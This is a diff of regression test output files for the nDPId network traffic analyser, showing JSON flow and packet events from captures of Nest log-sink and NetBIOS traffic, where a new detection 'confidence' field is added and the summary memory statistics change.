+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718052990,"flow_last_seen":1536718055162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536718055162,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":775,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1536717450091,"flow_last_seen":1536718053058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1536718175913,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1536718202959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1536718202959,"pkt":"AJD7JidrGLQwJjRACABFAABEMJoAAP8RJazAqPIPwKjyAc5xADUAMPGqwpsBAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1536718202959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1536718202959,"pkt":"GLQwJjRAAJD7JidrCABFAABUb5VAAEARZaHAqPIBwKjyDwA1znEAQGW0wpuBgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202984,"flow_last_seen":1536718202984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536718202984,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1536718202984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536718202984,"pkt":"AJD7JidrGLQwJjRACABFAAAsMJsAAP8GGgLAqPIPI7yauvd3K1cJJajVAAAAAGACEgBBYgAAAgQEgAAA"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1536718203039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536718203039,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93fElurmCSWo1mASbvAz1wAAAgQFjA=="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1536718203042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536718203042,"pkt":"AJD7JidrGLQwJjRACABFAAAoMJwAAP8GGgXAqPIPI7yauvd3K1cJJajWxJbq51AQEgCoXAAAAAAAAAAA"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718202984,"flow_last_seen":1536718205132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536718205132,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718202984,"flow_last_seen":1536718205132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536718205132,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718206572,"flow_last_seen":1536718206572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536718206572,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1536718206572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536718206572,"pkt":"AJD7JidrGLQwJjRACABFAAAsMLcAAP8GYcHAqPIPI65S7fd4K1cJMSXhAAAAAGACEgAMJQAAAgQEgAAA"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1536718206638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536718206638,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93jm8XvxCTEl4mASaQNQ+QAAAgQFtA=="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1536718206640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536718206640,"pkt":"AJD7JidrGLQwJjRACABFAAAoMLgAAP8GYcTAqPIPI65S7fd4K1cJMSXi5vF78lAQEgC\/uQAAAAAAAAAA"}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718206572,"flow_last_seen":1536718208745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536718208745,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718206572,"flow_last_seen":1536718208745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536718208745,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718209313,"flow_last_seen":1536718209313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536718209313,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1536718209313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536718209313,"pkt":"AJD7JidrGLQwJjRACABFAAAsMMIAAP8GGdvAqPIPI7yauvd5K1cJPKL3AAAAAGACEgBHJwAAAgQEgAAA"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1536718209383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536718209383,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93le92HNCTyi+GASbvAoVQAAAgQFjA=="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1536718209385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536718209385,"pkt":"AJD7JidrGLQwJjRACABFAAAoMMQAAP8GGd3AqPIPI7yauvd5K1cJPKL4XvdhzlAQEgCc2gAAAAAAAAAA"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718209313,"flow_last_seen":1536718211481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536718211481,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
-00665{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":886,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1536718052990,"flow_last_seen":1536718206634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1536718332151,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
-00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":886,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536718202984,"flow_last_seen":1536718206546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":9459,"flow_avg_l4_payload_len":193,"midstream":0,"ts_msec":1536718332151,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
-00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":886,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536718209313,"flow_last_seen":1536718211968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2258,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1536718332151,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
-00654{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":886,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1536718332151,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1536718392321,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1536718206572,"flow_last_seen":1536719715232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536719715232,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718209313,"flow_last_seen":1536718211481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536718211481,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":886,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1536718052990,"flow_last_seen":1536718206634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1536718332151,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":886,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536718202984,"flow_last_seen":1536718206546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":9459,"flow_avg_l4_payload_len":193,"midstream":0,"ts_msec":1536718332151,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":886,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536718209313,"flow_last_seen":1536718211968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2258,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1536718332151,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00680{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":886,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1536718332151,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1536718392321,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1536718206572,"flow_last_seen":1536719715232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536719715232,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
 00165{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","total-events-serialized":112}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1000/774
@@ -118,10 +118,10 @@
 ~~ total active/idle flows...: 17/17
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4661051 bytes
-~~ total memory freed........: 4661051 bytes
-~~ total allocations/frees...: 100387/100387
+~~ total memory allocated....: 4740756 bytes
+~~ total memory freed........: 4740756 bytes
+~~ total allocations/frees...: 101977/101977
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 170 chars
-~~ json string max len.......: 772 chars
-~~ json string avg len.......: 541 chars
+~~ json string max len.......: 798 chars
+~~ json string avg len.......: 554 chars
diff --git a/test/results/netbios.pcap.out b/test/results/netbios.pcap.out
index fd8710036..f852b0616 100644
--- a/test/results/netbios.pcap.out
+++ b/test/results/netbios.pcap.out
@@ -1,73 +1,73 @@
 00439{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"netbios.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1447772210350,"flow_last_seen":1447772210350,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1447772210350,"l3_proto":"ip4","src_ip":"10.0.4.131","dst_ip":"10.0.5.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netbios.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1447772210350,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1447772210350,"pkt":"\/\/\/\/\/\/\/\/ABj+bLz3CABFAABOYvYAAIARuScKAASDCgAF\/wCJAIkAOr8ep0kBEAABAAAAAAAAIEZJRkRGRUZDRUZFQkVORlBFSUZKQ0FDQUNBQ0FDQUFBAAAgAAE="}
